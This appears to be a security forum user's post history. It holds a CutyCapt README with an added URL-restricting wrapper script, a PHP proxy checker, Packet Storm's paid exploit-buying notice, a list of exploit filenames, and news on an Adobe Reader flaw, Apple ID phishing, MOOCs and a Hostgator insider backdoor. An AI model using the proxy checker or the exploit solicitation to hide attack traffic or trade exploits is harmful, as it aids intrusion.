Everything posted by Fi8sVrs

  1. Fi8sVrs

    CutyCapt

    CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP. See IECapt for a similar tool based on Internet Explorer.

    Samples
    Here are some samples of CutyCapt generated renderings:
      PNG Snapshot of http://digg.com
      PNG Snapshot of css Zen Garden: The Beauty in CSS Design
      SVG Snapshot of MSDN Silverlight Dev Center
      PDF Snapshot of MSDN Silverlight Dev Center

    Status
    CutyCapt has a number of known quirks, most of which are caused by problems with Qt and/or WebKit. For example, while plugin support can be enabled, and the plugins execute properly, their rendering cannot be captured on some platforms. Use with caution.

    Requirements
    CutyCapt depends on Qt 4.4.0+.

    Download
    Help wanted! Previously I have used MinGW to make a static Qt build and correspondingly single-file CutyCapt executables for Windows. However, MinGW no longer supports single-file executables for threaded applications, they require to re-distribute a DLL instead, and Qt no longer supports static builds of QtWebkit. Similarly, if I just used Visual Studio 2010, as I do for normal development, proper builds would have to redistribute Microsoft runtime DLLs. Anyone who wants to prepare CutyCapt.exe + *.DLL builds is most welcome to join the project to do so, or alternatively provide them externally which I would then link from here. Let me know if you are interested. Thanks.
      CutyCapt-Win32-2010-04-26.zip (7MB, .exe for Win32 systems)
      CutyCapt-Win32-2008-06-11.zip (6MB, .exe for Win32 systems)

    Source code
    The source code is available in the SVN repository (download tarball).

    Usage
    Open a command prompt and ask for help:

      % CutyCapt --help
      -----------------------------------------------------------------------------
      Usage: CutyCapt --url=http://www.example.org/ --out=localfile.png
      -----------------------------------------------------------------------------
        --help                         Print this help page and exit
        --url=<url>                    The URL to capture (http:...|file:...|...)
        --out=<path>                   The target file (.png|pdf|ps|svg|jpeg|...)
        --out-format=<f>               Like extension in --out, overrides heuristic
        --min-width=<int>              Minimal width for the image (default: 800)
        --min-height=<int>             Minimal height for the image (default: 600)
        --max-wait=<ms>                Don't wait more than (default: 90000, inf: 0)
        --delay=<ms>                   After successful load, wait (default: 0)
        --user-styles=<url>            Location of user style sheet, if any
        --header=<name>:<value>        request header; repeatable; some can't be set
        --method=<get|post|put>        Specifies the request method (default: get)
        --body-string=<string>         Unencoded request body (default: none)
        --body-base64=<base64>         Base64-encoded request body (default: none)
        --app-name=<name>              appName used in User-Agent; default is none
        --app-version=<version>        appVers used in User-Agent; default is none
        --user-agent=<string>          Override the User-Agent header Qt would set
        --javascript=<on|off>          JavaScript execution (default: on)
        --java=<on|off>                Java execution (default: unknown)
        --plugins=<on|off>             Plugin execution (default: unknown)
        --private-browsing=<on|off>    Private browsing (default: unknown)
        --auto-load-images=<on|off>    Automatic image loading (default: on)
        --js-can-open-windows=<on|off> Script can open windows? (default: unknown)
        --js-can-access-clipboard=<on|off> Script clipboard privs (default: unknown)
        --print-backgrounds=<on|off>   Backgrounds in PDF/PS output (default: off)
      -----------------------------------------------------------------------------
      <f> is svg,ps,pdf,itext,html,rtree,png,jpeg,mng,tiff,gif,bmp,ppm,xbm,xpm
      -----------------------------------------------------------------------------

    Build Instructions
    If your system is set up to compile Qt applications, building CutyCapt should be a simple matter of checking out the source code and running qmake and your version of make. As an example, if you are running Ubuntu Hardy Heron and have configured the system to use packages from hardy-backports, the following should do:

      % sudo apt-get install subversion libqt4-webkit libqt4-dev g++
      % svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt
      % cd cutycapt/CutyCapt
      % qmake
      % make
      % ./CutyCapt --url=http://www.example.org --out=example.png

    Using CutyCapt without X server
    You cannot use CutyCapt without an X server, but you can use e.g. Xvfb as light-weight server if you are not running an interactive graphical desktop environment. For example, you could use:

      % xvfb-run --server-args="-screen 0, 1024x768x24" ./CutyCapt --url=... --out=...

    Author
    Björn Höhrmann bjoern@hoehrmann.de

    Source: CutyCapt - A Qt WebKit Web Page Rendering Capture Utility
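    As an added example, not part of CutyCapt or of its README: a POSIX shell wrapper for the batch, headless use the README describes (Xvfb plus a list of URLs), written for the case where the URL list comes from someone else. Assumed: CutyCapt built as ./CutyCapt as above, xvfb-run and coreutils timeout installed, and a urls.txt with one URL per line; the function names and the output directory are mine.

```shell
#!/bin/sh
# Added example, not part of the CutyCapt project: capture a list of URLs
# with CutyCapt under Xvfb while treating the targets as untrusted input.
# Assumptions: CutyCapt was built as ./CutyCapt (override with CUTYCAPT=...),
# xvfb-run and coreutils timeout are installed, urls.txt has one URL per line.

CUTYCAPT="${CUTYCAPT:-./CutyCapt}"
OUTDIR="${OUTDIR:-shots}"

# Only render remote http(s) targets. CutyCapt accepts file:... URLs, so a
# list you did not write yourself could otherwise make the capture host
# render any file the current user can read into the output image.
is_allowed_url() {
    case "$1" in
        http://*|https://*) return 0 ;;
        *) return 1 ;;
    esac
}

# Derive an output filename from the URL: scheme dropped, every character
# outside [A-Za-z0-9._-] replaced by '_', leading dots stripped (no hidden
# files, and no slashes, so the name cannot escape OUTDIR), length capped.
safe_name() {
    printf '%s' "$1" \
        | sed -e 's#^[A-Za-z]*://##' -e 's/[^A-Za-z0-9._-]/_/g' -e 's/^\.*//' \
        | cut -c1-120
}

# Render one URL. JavaScript, Java and plugins are off so the page cannot
# drive WebKit; --max-wait bounds a stalled load inside CutyCapt, and
# timeout(1) bounds the whole process in case Qt/WebKit hangs, which the
# README warns can happen. -a lets xvfb-run pick a free display number.
capture_one() {
    url="$1"
    out="$OUTDIR/$(safe_name "$url").png"
    timeout 90 xvfb-run -a --server-args="-screen 0 1024x768x24" \
        "$CUTYCAPT" --url="$url" --out="$out" \
        --javascript=off --plugins=off --java=off \
        --max-wait=30000 --min-width=1024 --min-height=768 \
        --user-agent="screenshot-bot/1.0" \
        >/dev/null
}

# Walk the list, skipping blank lines and anything failing the scheme check.
capture_list() {
    mkdir -p "$OUTDIR"
    while IFS= read -r url || [ -n "$url" ]; do
        [ -n "$url" ] || continue
        if ! is_allowed_url "$url"; then
            echo "skip (not http/https): $url" >&2
            continue
        fi
        if capture_one "$url"; then
            echo "ok   $url"
        else
            echo "FAIL $url" >&2
        fi
    done < "$1"
}

if [ $# -gt 0 ]; then
    capture_list "$1"
fi
```

    Run it as sh capture.sh urls.txt. The scheme check matters because the tool's own help lists file:... as an accepted URL form, so a screenshot job fed an attacker's list would otherwise double as a local file reader.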
  2. Bug Bounty What is better than getting your exploit published on Packet Storm? Getting paid when your exploit is published on Packet Storm! Packet Storm is offering large sums of cash for well crafted code execution exploits. Why is this program better than other bug bounty programs? Other companies that buy exploits rarely share them with the public and once bought, require that the author does not share them. We are going the other direction on this idea. If the author of the exploit permits it, we plan to release them publicly after sixty days for everyone to download. Win - Win. Why the disclosure? Because it helps the greater good and is in-line with our initiative to provide security engineers the ability to test their systems for recently patched vulnerabilities. I'm in. What are the next steps? You can talk to us by sending an email to getpaid at packetstormsecurity.com with description of your exploit or by submitting the contact form below. Please do not send us the code at this step. The list of targets that we are looking for moves constantly. If you believe that you can offer quality exploits that demonstrate full code execution, it is worth a discussion. It is vitally important that you can articulate what is being exploited, how it is being exploited, what systems and patch levels you have tested with, and that your work is 100% yours to sell. We will not accept exploits that already have public proof of concepts, nor will we accept known plagiarized work. How much money can I make? Different issues offer different levels of compensation. The typical payout for a working exploit ranges anywhere from $1,000 - $7,000 USD and there is the opportunity for even larger payouts if you have written some amazing zero-day. Nothing is off the table. 
    That said, in the typical pay range, we're also soliciting code execution exploits for "0.5-day" vulnerabilities in mainstream software such as Microsoft Windows and Oracle Java that already have a published advisory but with no known working exploit.

    Source: Bug Bounty - Packet Storm
  3. This php script is a small tool for performing proxy checks.

    <?php
    /***********************************************
     * Multithreaded Proxy Checker
     * Coded by Miyachung
     * Janissaries.Org
     * Miyachung@hotmail.com
     ------------------------------------------------
     * Demonstration -> http://www.youtube.com/watch?v=4icPZHv3W9g
     * Type list like IP:PORT in a file
     ***********************************************/
    set_time_limit(0);

    echo "\n[+]Enter your proxy list: ";
    $proxy_list = trim(fgets(STDIN));
    echo "[+]Enter number of thread: ";
    $thread = max(1, (int) trim(fgets(STDIN)));   // concurrent cURL handles per batch
    echo "[+]Enter timeout sec: ";
    $timeout = max(1, (int) trim(fgets(STDIN)));  // per-request timeout in seconds

    if (!is_readable($proxy_list)) {
        die("[-]Cannot read $proxy_list\n");
    }
    echo "[+]Checking proxies\n";
    echo "-------------------------------------------------------\n";

    // One IP:PORT per line; drop surrounding whitespace and blank lines.
    $ips = array_values(array_filter(array_map('trim', file($proxy_list))));
    checker($ips, $thread, $timeout);

    /*
     * Check proxies in batches of $thread using curl_multi. An entry counts
     * as working when a request to http://IP:PORT/ gets any HTTP status
     * back, i.e. the check verifies that something speaking HTTP listens on
     * that address, not that it actually forwards requests.
     */
    function checker(array $ips, $thread, $timeout)
    {
        $multi = curl_multi_init();
        $total = 0;
        $time1 = time();
        foreach (array_chunk($ips, $thread) as $batch) {
            $curl = [];  // fresh handle set per batch, so a shorter last batch
                         // does not re-report handles left over from the previous one
            foreach ($batch as $i => $ip) {
                $curl[$i] = curl_init();
                curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($curl[$i], CURLOPT_URL, 'http://' . $ip . '/');
                curl_setopt($curl[$i], CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($curl[$i], CURLOPT_TIMEOUT, $timeout);
                curl_multi_add_handle($multi, $curl[$i]);
            }
            // Drive all handles; curl_multi_select blocks instead of busy-looping.
            do {
                curl_multi_exec($multi, $active);
                if ($active) {
                    curl_multi_select($multi, 1.0);
                }
            } while ($active > 0);
            foreach ($curl as $i => $handle) {
                $info = curl_getinfo($handle);
                curl_multi_remove_handle($multi, $handle);
                curl_close($handle);
                if ($info['http_code'] != 0) {
                    $total++;
                    echo "[~]Proxy works -> " . $batch[$i] . "\n";
                    save_file("works.txt", $batch[$i]);
                }
            }
        }
        curl_multi_close($multi);
        $time2 = time();
        echo "\n[+]Total working proxies: $total, checking completed\n";
        echo "[+]Elapsed time -> " . ($time2 - $time1) . " seconds\n";
        echo "[+]Coded by miyachung || Janissaries.Org\n";
        echo "-------------------------------------------------------\n";
    }

    // Append one line to $file.
    function save_file($file, $content)
    {
        file_put_contents($file, $content . "\r\n", FILE_APPEND);
    }
    ?>
  4. A basic guide on how to root a linux server. You can read more information about the tutorial here: Rooting a Linux Server | ZentrixPlus
  5. This archive contains all of the 118 exploits added to Packet Storm in April, 2013.

     Directory of C:\1304-exploits\1304-exploits

    05/01/2013  01:02 PM    <DIR>          .
    05/01/2013  01:02 PM    <DIR>          ..
    04/09/2013  12:52 AM             1,457 aastra-passwd.txt
    04/10/2013  05:25 AM            20,449 adobe_coldfusion_apsb13_03.rb.txt
    04/01/2013  09:52 PM             1,386 aspen-traversal.txt
    04/07/2013  08:52 PM             2,425 belkinwemo-upload.txt
    04/11/2013  06:25 AM             5,775 bigant297-overflow.txt
    04/25/2013  12:52 AM             2,654 ciscolinksys2000-dos.txt
    04/26/2013  03:41 PM             2,672 cmscameronmckenna-xss.txt
    04/21/2013  04:52 PM             3,176 colormix-xssspoofdisclose.txt
    04/30/2013  04:10 AM            16,232 CORE-2013-0301.txt
    04/30/2013  04:11 AM            20,324 CORE-2013-0303.txt
    04/19/2013  03:41 PM             1,338 craftysyntax-rfidisclose.txt
    04/05/2013  04:03 AM             5,531 CRD-2013-02.txt
    04/24/2013  04:03 AM             5,746 dir615300-execxssxsrf.txt
    04/26/2013  10:52 PM             5,350 dir635-xssxsrf.txt
    04/09/2013  06:52 AM             4,546 dlink-inject.txt
    04/11/2013  07:20 AM             6,862 dlink_diagnostic_exec_noauth.rb.txt
    04/13/2013  08:25 PM             3,444 dotclear-spoofxss.txt
    04/06/2013  01:52 PM             3,512 easyftpserver-dos.txt
    04/09/2013  04:30 AM             4,664 easyphpwebserver-exec.txt
    04/27/2013  07:14 PM               631 elecardmpeg-overflow.txt
    04/13/2013  07:03 PM             3,303 fmw-passwd.txt
    04/30/2013  04:00 AM             1,084 foecms165-sqlxss.txt
    04/18/2013  11:14 PM             1,240 forkcms-lfi.txt
    04/18/2013  09:52 PM             1,177 forkcms-storedxss.txt
    04/18/2013  10:52 PM             1,670 forkcms-xsrf.txt
    04/09/2013  08:24 AM               711 foscam-xsrf.txt
    04/19/2013  04:14 PM            46,020 foxitreader5-dos.tgz
    04/18/2013  05:25 AM             1,900 freefloatftp_user.rb.txt
    04/28/2013  02:52 AM             3,530 freepbx-exec.txt
    04/03/2013  06:52 PM             4,934 fudforum-exec.txt
    04/25/2013  04:29 AM             3,992 groundwork_monarch_cmd_exec.rb.txt
    04/08/2013  01:52 PM             3,305 hexchat-overflow.txt
    04/24/2013  10:52 PM             1,330 hornbill-sql.txt
    04/07/2013  08:03 PM             2,628 hp_smhstart.rb.txt
    04/02/2013  07:39 PM             2,572 hp_system_management.rb.txt
    04/02/2013  08:30 AM               266 index.html
    04/30/2013  03:57 AM             1,616 ipswitchimail-xss.txt
    04/12/2013  05:00 AM             1,862 ircd-hybrid.pl.txt
    04/27/2013  01:52 PM             1,066 ironlavacorp-sqlshell.txt
    04/23/2013  06:43 AM             4,440 java_jre17_reflection_types.rb.txt
    04/22/2013  07:14 PM             6,710 joomlacivic-shell.txt
    04/21/2013  07:14 PM             3,905 jplayer-xssspoof.txt
    04/10/2013  06:29 AM             1,617 karteekdocsplit-exec.txt
    04/12/2013  05:03 AM             2,559 kelreddpruview-exec.txt
    04/19/2013  04:14 PM               815 kikmessenger-disclose.txt
    04/30/2013  03:56 AM               971 killthebox.py.txt
    04/30/2013  03:45 AM             2,001 KIS-2013-04.txt
    04/17/2013  11:52 PM             3,978 krisonavcms-xssxsrf.txt
    04/30/2013  04:04 AM             2,164 linksyse1200n300-xss.txt
    04/02/2013  07:45 PM             7,696 linksys_e1500_apply_exec.rb.txt
    04/10/2013  06:37 AM            18,523 linksys_wrt54gl_apply_exec.rb.txt
    04/16/2013  02:52 AM             1,233 md2pdf-exec.txt
    04/15/2013  09:52 PM             1,349 minalicwebserver-overflow.txt
    04/19/2013  10:52 PM             4,223 minalic_2_post_winserv03_sp2.py.txt
    04/09/2013  06:52 AM             6,885 miniweb-shelltraversal.txt
    04/02/2013  07:46 PM            11,778 mongod_native_helper.rb.txt
    04/12/2013  05:13 AM             6,001 nagios_nrpe_arguments.rb.txt
    04/04/2013  07:29 AM             7,943 netgear_dgn1000b_setup_exec.rb.txt
    04/20/2013  05:39 AM            13,730 netgear_dgn2200b_pppoe_exec.rb.txt
    04/01/2013  10:52 PM             3,032 networkweathermap-xss.txt
    04/19/2013  02:41 PM               925 nginx-inject.txt
    04/07/2013  10:52 PM             2,069 otrsfaq-xss.txt
    05/01/2013  01:35 AM             1,947 pfshttp-overflow.txt
    04/30/2013  04:23 AM             4,895 phpmyadmin_preg_replace.rb.txt
    04/28/2013  12:52 AM             1,481 phpvalleymicrojobs-takeover.txt
    04/16/2013  12:52 AM             1,677 phpvms-sql.txt
    04/30/2013  04:23 AM             7,386 php_wordpress_total_cache.rb.txt
    04/04/2013  07:06 AM               843 pollencms-disclose.txt
    04/02/2013  10:52 PM             6,087 ponyos-exec.txt
    05/01/2013  01:02 PM                 0 print.txt
    04/23/2013  08:25 PM             1,090 public_phpInjection-smf204.txt
    04/04/2013  01:52 PM               671 radiocms-sql.txt
    04/01/2013  10:52 PM               723 rubygemldoce-exec.txt
    04/03/2013  07:14 PM             8,969 SA-20130403-0.txt
    04/04/2013  07:39 PM             5,071 SA-20130404-0.txt
    04/09/2013  08:32 AM             3,110 SA-20130408-0.txt
    04/17/2013  06:52 PM             5,707 SA-20130417-0.txt
    04/17/2013  09:14 PM             7,164 SA-20130417-1.txt
    04/18/2013  12:52 AM             4,317 SA-20130417-2.txt
    04/19/2013  10:53 AM             2,533 sapconfigservlet-exec.rb.txt
    04/30/2013  04:26 AM             4,346 sap_configservlet_exec_noauth.rb.txt
    04/18/2013  03:52 PM             4,112 servicestore-xss.txt
    04/17/2013  08:52 PM             2,822 sitecomwlm3500-backdoor.txt
    04/03/2013  04:30 AM             7,605 smallftpd103-dos.txt
    04/03/2013  10:41 PM             2,459 SOS-13-011.txt
    04/18/2013  09:52 PM             4,190 swfupload-injectxsrfxss.txt
    04/03/2013  11:03 PM             3,255 symphony-sql.txt
    04/10/2013  05:03 AM             5,509 sysaxmsssh-dos.txt
    05/01/2013  02:12 AM             1,982 syslogwatcherpro-xss.txt
    04/03/2013  10:14 PM             2,157 TC-SA-2013-01.txt
    04/19/2013  06:03 PM             2,335 tienda-xss.txt
    04/29/2013  01:52 PM             1,164 tinymceajax-exec.txt
    04/01/2013  01:52 PM           632,912 tinyweb_v1.93_DOS.zip
    04/14/2013  03:41 PM               622 todooforum-sqlxss.txt
    04/19/2013  03:41 PM             1,892 tplink-freezedos.txt
    04/06/2013  11:52 PM             1,965 tplinktd8817-xsrf.txt
    04/06/2013  07:14 PM             3,713 twg-disclose.txt
    04/19/2013  10:46 AM             6,727 TWSL2013-004.txt
    04/08/2013  10:52 PM             2,694 vanilla20184-sql.txt
    04/15/2013  05:14 PM             1,079 vanillaforums-xsrf.txt
    04/22/2013  06:03 PM               459 vbilling-sql.txt
    04/29/2013  02:41 PM             8,205 VL-804.txt
    04/21/2013  11:52 PM               977 voipnow-lfi.txt
    04/10/2013  06:21 AM             3,013 waraxe-2013-SA102.txt
    04/25/2013  10:52 PM            12,421 waraxe-2013-SA103.txt
    04/02/2013  06:52 PM             1,648 whmcsgrouppay-sql.txt
    04/25/2013  11:25 PM             4,428 windowslight-overflow.txt
    05/01/2013  01:41 AM             1,341 wowzamedia-escape.txt
    04/01/2013  10:52 PM             4,813 wpfuneralpress-xss.txt
    04/26/2013  10:25 PM            11,357 wpsoffice-overflow.tgz
    04/11/2013  07:03 AM             2,088 wpspider-sql.txt
    04/10/2013  04:52 AM               968 wpspiffy-sql.txt
    04/09/2013  04:30 AM             1,703 wptrafficanalyzer-xss.txt
    04/10/2013  06:14 AM             1,612 zapms141-sql.txt
    04/09/2013  07:23 AM             4,015 zcb-xss.txt
    04/02/2013  07:37 PM             4,017 zenworks_control_center_upload.rb.txt
    04/17/2013  07:14 PM             2,638 zpanel-exec.txt
    04/15/2013  11:52 PM             2,523 ZSL-2013-5136.txt
    04/15/2013  11:52 PM             2,812 ZSL-2013-5137.txt
    04/16/2013  12:25 AM             5,504 ZSL-2013-5138.txt
                 120 File(s)      1,150,680 bytes
                   2 Dir(s)  33,536,339,968 bytes free

    Source: Packet Storm New Exploits For April, 2013 - Packet Storm
  6. McAfee said it has found a vulnerability in Adobe Systems' Reader program that reveals when and where a PDF document is opened. The issue emerges when some users launch a link to another file path, which calls on the JavaScript application programming interface (API), while Reader alerts a user when they are going to call on a resource from another place. The issue is not a serious problem and does not allow for remote code execution, but McAfee does consider it a security problem and has notified Adobe. It affects every version of Adobe Reader, including the latest version, 11.0.2, wrote McAfee's Haifei Li. McAfee declined to reveal the details of the vulnerability as Adobe is yet to release a patch for it. The vendor said that it has already detected a number of groups and people exploiting it, potentially for malicious purposes. McAfee suggests that Adobe Reader users disable JavaScript until a patch is released. Source: Adobe Reader PDF-tracking vulnerability reveals when and where PDF is opened | thehackernews.com
  7. SAN JOSE, Calif. — Dazzled by the potential of free online college classes, educators are now turning to the gritty task of harnessing online materials to meet the toughest challenges in American higher education: giving more students access to college, and helping them graduate on time. Nearly half of all undergraduates in the United States arrive on campus needing remedial work before they can begin regular credit-bearing classes. That early detour can be costly, leading many to drop out, often in heavy debt and with diminished prospects of finding a job. Meanwhile, shrinking state budgets have taken a heavy toll at public institutions, reducing the number of seats available in classes students must take to graduate. In California alone, higher education cuts have left hundreds of thousands of college students without access to classes they need. To address both problems and keep students on track to graduation, universities are beginning to experiment with adding the new “massive open online courses,” created to deliver elite college instruction to anyone with an Internet connection, to their offerings. While the courses, known as MOOCs, have enrolled millions of students around the world, most who enroll never start a single assignment, and very few complete the courses. So to reach students who are not ready for college-level work, or struggling with introductory courses, universities are beginning to add extra supports to the online materials, in hopes of improving success rates. Here at San Jose State, for example, two pilot programs weave material from the online classes into the instructional mix and allow students to earn credit for them. “We’re in Silicon Valley, we breathe that entrepreneurial air, so it makes sense that we are the first university to try this,” said Mohammad Qayoumi, the university’s president. “In academia, people are scared to fail, but we know that innovation always comes with the possibility of failure. 
And if it doesn’t work the first time, we’ll figure out what went wrong and do better.” In one pilot program, the university is working with Udacity, a company co-founded by a Stanford professor, to see whether round-the-clock online mentors, hired and trained by the company, can help more students make their way through three fully online basic math courses. The tiny for-credit pilot courses, open to both San Jose State students and local high school and community college students, began in January, so it is too early to draw any conclusions. But early signs are promising, so this summer, Udacity and San Jose State are expanding those classes to 1,000 students, and adding new courses in psychology and computer programming, with tuition of only $150 a course. San Jose State has already achieved remarkable results with online materials from edX, a nonprofit online provider, in its circuits course, a longstanding hurdle for would-be engineers. Usually, two of every five students earn a grade below C and must retake the course or change career plans. So last spring, Ellen Junn, the provost, visited Anant Agarwal, an M.I.T. professor who taught a free online version of the circuits class, to ask whether San Jose State could become a living lab for his course, the first offering from edX, an online collaboration of Harvard and the Massachusetts Institute of Technology. Ms. Junn hoped that blending M.I.T.'s online materials with live classroom sessions might help more students succeed. Dr. Agarwal, the president of edX, agreed enthusiastically, and without any formal agreement or exchange of money, he arranged for San Jose State to offer the blended class last fall. The results were striking: 91 percent of those in the blended section passed, compared with 59 percent in the traditional class. 
“We’re engineers, and we check our results, but if this semester is similar, we will not have the traditional version next year,” said Khosrow Ghadiri, who teaches the blended class. “It would be educational malpractice.” It is hard to say, though, how much the improved results come from the edX online materials, and how much from the shift to classroom sessions focusing on small group projects, rather than lectures. Finding better ways to move students through the start of college is crucial, said Josh Jarrett, a higher education officer at the Bill and Melinda Gates Foundation, which in the past year has given grants to develop massive open online courses for basic and remedial courses. “For us, 2012 was all about trying to tilt some of the MOOC attention toward the more novice learner, the low-income and first-generation students,” he said. “And 2013 is about blending MOOCs into college courses where there is additional support, and students can get credit. While some low-income young adults can benefit from what I call the free-range MOOCs, the research suggests that most are going to need more scaffolding, more support.” Until now, there has been little data on how well the massive online courses work, and for which kinds of students. Blended courses provide valuable research data because outcomes can easily be compared with those from a traditional class. “The results in the San Jose circuits course are probably the most interesting data point in the whole MOOC movement,” Mr. Jarrett said. Said Dr. Junn, “We want to bring all the hyperbole around MOOCs down to reality, and really see at a granular level that’s never before been available, how well they work for underserved students.” Online courses are undeniably chipping at the traditional boundaries of higher education. Until now, most of the millions of students who register for them could not earn credit for their work. But that is changing, and not just at San Jose State. 
    The three leading providers, Udacity, EdX and Coursera, are all offering proctored exams, and in some cases, certification for transfer credit through the American Council on Education. Last month, in a controversial proposal, the president pro tem of the California Senate announced the introduction of legislation allowing students in the state’s public colleges and universities who cannot get a seat in oversubscribed lower-level classes to earn credit for faculty-approved online versions, including those from private vendors like edX and Udacity. And on Wednesday, San Jose State announced that next fall, it will pay a licensing fee to offer three to five more blended edX courses, probably including Harvard’s “Ancient Greek Heroes” and Berkeley’s “Artificial Intelligence.” And over the summer, it will train 11 other California State campuses to use the blended M.I.T. circuits course. Dr. Qayoumi favors the blended model for upper-level courses, but fully online courses like Udacity’s for lower-level classes, which could be expanded to serve many more students at low cost. Traditional teaching will be disappearing in five to seven years, he predicts, as more professors come to realize that lectures are not the best route to student engagement, and cash-strapped universities continue to seek cheaper instruction. “There may still be face-to-face classes, but they would not be in lecture halls,” he said. “And they will have not only course material developed by the instructor, but MOOC materials and labs, and content from public broadcasting or corporate sources. But just as faculty currently decide what textbook to use, they will still have the autonomy to choose what materials to include.” While San Jose State professors decided what material should be covered in the three Udacity math courses, it was Udacity employees who determined the course look and flow — and, in most cases, appeared on camera.
“We gave them lecture notes and a textbook, and they ‘Udacified’ things, and wrote the script, which we edited,” said Susan McClory, San Jose State’s developmental math coordinator. “We made sure they used our way of finding a common denominator.” The online mentors work in shifts at Udacity’s offices in nearby Mountain View, Calif., waiting at their laptops for the “bing” that signals a question, and answering immediately. “We get to hear the ‘aha’ moments, and these all-caps messages ‘THANK YOU THANK YOU THANK YOU,’ ” said Rachel Meltzer, a former clinical research manager at Stanford and mentor who is starting medical school next fall. The mentors answer about 30 questions a day, like how to type the infinity symbol or add unlike fractions — or, occasionally, whether Ms. Meltzer is interested in a date. The questions appear in a chat box on-screen, but tutoring can move to a whiteboard, or even a live conversation. When many students share confusion, mentors provide feedback to the instructors. The San Jose State professors were surprised at the speed with which the project came together. “The first word was in November, and it started in January,” said Ronald Rogers, one of the statistics professors. “Academics usually form a committee for months before anything happens.” But Udacity’s approach was appealing. “What attracted us to Udacity was the pedagogy, that they break things into very small segments, then ask students to figure things out, before you’ve told them the answer,” said Dr. Rogers, who spends an hour a day reading comments on the discussion forum for students in the worldwide version of the class. Results from the pilot for-credit version with the online mentors will not be clear until after the final exams, which will be proctored by webcam. But one good sign is that, in the pilot statistics course, every student, including a group of high school students from an Oakland charter school, completed the first, unproctored exam. 
“We’re approaching this as an empirical question,” Dr. Rogers said. “If the results are good, then we’ll scale it up, which would be very good, given how much unmet demand we have at California public colleges.” Any wholesale online expansion raises the specter of professors being laid off, turned into glorified teaching assistants or relegated to second-tier status, with only academic stars giving the lectures. Indeed, the faculty unions at all three California higher education systems oppose the legislation requiring credit for MOOCs for students shut out of on-campus classes. The state, they say, should restore state financing for public universities, rather than turning to unaccredited private vendors. But with so many students lacking access, others say, new alternatives are necessary. “I’m involved in this not to destroy brick-and-mortar universities, but to increase access for more students,” Dr. Rogers said. And if short videos and embedded quizzes with instant feedback can improve student outcomes, why should professors go on writing and delivering their own lectures? “Our ego always runs ahead of us, making us think we can do it better than anyone else in the world,” Dr. Ghadiri said. “But why should we invent the wheel 10,000 times? This is M.I.T., No. 1 school in the nation — why would we not want to use their material?” There are, he said, two ways of thinking about what the MOOC revolution portends: “One is me, me, me — me comes first. The other is, we are not in this business for ourselves, we are here to educate students.” Source: http://www.nytimes.com/2013/04/30/education/colleges-adapt-online-courses-to-ease-burden.html?pagewanted=1&_r=3&ref=technology
  8. Apple users are being warned to stay vigilant following the discovery of a new series of Phishing attacks targeting the Apple ID network. Researchers with Trend Micro have uncovered a series of compromised sites which are being used to host phony log-in pages. Designed to resemble the Apple ID log-in screen, the pages ask users to enter both their usernames and passwords. The compromised credentials are then believed to be harvested by the attackers for future use in account thefts. Researchers noted that the phishing sites have been connected to a spam campaign as well. Designed to resemble an official Apple notification, the messages attempt to direct users to the phishing sites by warning of an impending account removal. "We’ve seen attacks targeting not only American users, but also British and French users," wrote Trend Micro fraud analyst Paul Pajares. "Some versions of this attack ask not only for the user's Apple ID login credentials, but also their billing address and other personal and credit card information." Though the pages themselves are designed to closely resemble the Apple ID site, researchers note that the address information itself can easily be spotted. Aside from not matching Apple's own domains, the pages do not use the secure connection required by Apple to log into its ID platform. In addition to using best practices to avoid spam sites, users can protect themselves from account theft by activating Apple's new two-factor authentication platform. Introduced by the company last month, the security tool pairs an account with a user's mobile phone and asks for a one-time use numerical code which is sent via SMS. Such two-factor controls have long been advocated by security experts for their ability to prevent account loss even when a user's log-in credentials are stolen. Source: Phishing scam targets Apple ID users - IT News from V3.co.uk
  9. A former employee of Hostgator has been arrested and charged with installing a backdoor that gave him almost unfettered control over more than 2,700 servers belonging to the widely used Web hosting provider. Eric Gunnar Gisse, 29, of San Antonio, Texas, was charged with felony breach of computer security by the district attorney's office of Harris County in Texas, according to court documents. He worked as a medium-level administrator from September 2011 until he was terminated on February 15, 2012, according to prosecutors and a company executive. A day after his dismissal, Hostgator officials discovered a backdoor application that allowed Gisse to log in to servers from remote locations, including a computer located at the Hetzner Data Center in Nuremberg, Germany. He took pains to disguise his malware as a widely used Unix administration tool to prevent his superiors from discovering the backdoor process, prosecutors said. "The process was named 'pcre', a common system file, in order to disguise the true purpose of the process which would grant an attacker unauthorized access into Hostgator's computer network," a Houston Police Department investigator and the document's "affiant," Gordon M. Garrett, wrote in an affidavit. "Complainant told affiant he searched Hostgator's computer network and found the unauthorized 'pcre' process installed on 2723 different Hostgator servers within the computer network." Gisse didn't return a voicemail and e-mail seeking comment for this report. A court docket shows he is scheduled to be arraigned next month and gives no indication he has entered a plea in the case. He's being held at the Harris County Jail on $20,000 bond, a spokeswoman at the district attorney's office said. The backdoor allowing near-unfettered "root" access to Apache Web server systems was possible because Gisse obtained a Hostgator digital SSH key and transferred it to computers under his control, including one at efnet.pe, Garrett alleged.
"The defendant then attempted to penetrate the Hostgator computer network from 'efnet.pe' using the Hostgator digital SSH key," Garrett wrote. Hostgator COO Patrick Pelanne, referred to as the "complainant" in the affidavit, told Ars the backdoor was discovered in February 2012, the same week that Gisse was terminated. While his root access gave Gisse access to private data stored on a large number of customer websites, there's no evidence he used it, the Hostgator executive said. "He did not access customer content," Pelanne told Ars. "We caught it well before he had any chance to do any of that." Given the rapid discovery, the malware was on Hostgator systems for less than a month. Although the affidavit alleges that the backdoor was discovered in February of 2013, Pelanne said that date is erroneous and is most likely the result of a typo. Harris County prosecutors weren't available to confirm that the 2013 date included in court documents was wrong. Gisse took other steps to conceal the compromise of Hostgator systems. On February 19, three days after Pelanne said the backdoor came to light, investigators found that two standard network diagnostic tools had been modified on the Web host's network. Specifically, the "ps" and "netstat" programs—which allow administrators to enumerate all running applications and network connections respectively—had been hacked to hide certain activities. Senior Hostgator security personnel "were activated to respond to, identify, and neutralize the intrusion incident," the affidavit said. While Gisse is presumed innocent until proven otherwise, the unconfirmed narrative provides a potent reminder of the threats that lurk from even mid-level employees inside companies that host sensitive information. Having secret control over 2,700 servers inside a Web hosting provider is no small matter, considering each machine can be used for hundreds or possibly thousands of individual websites. 
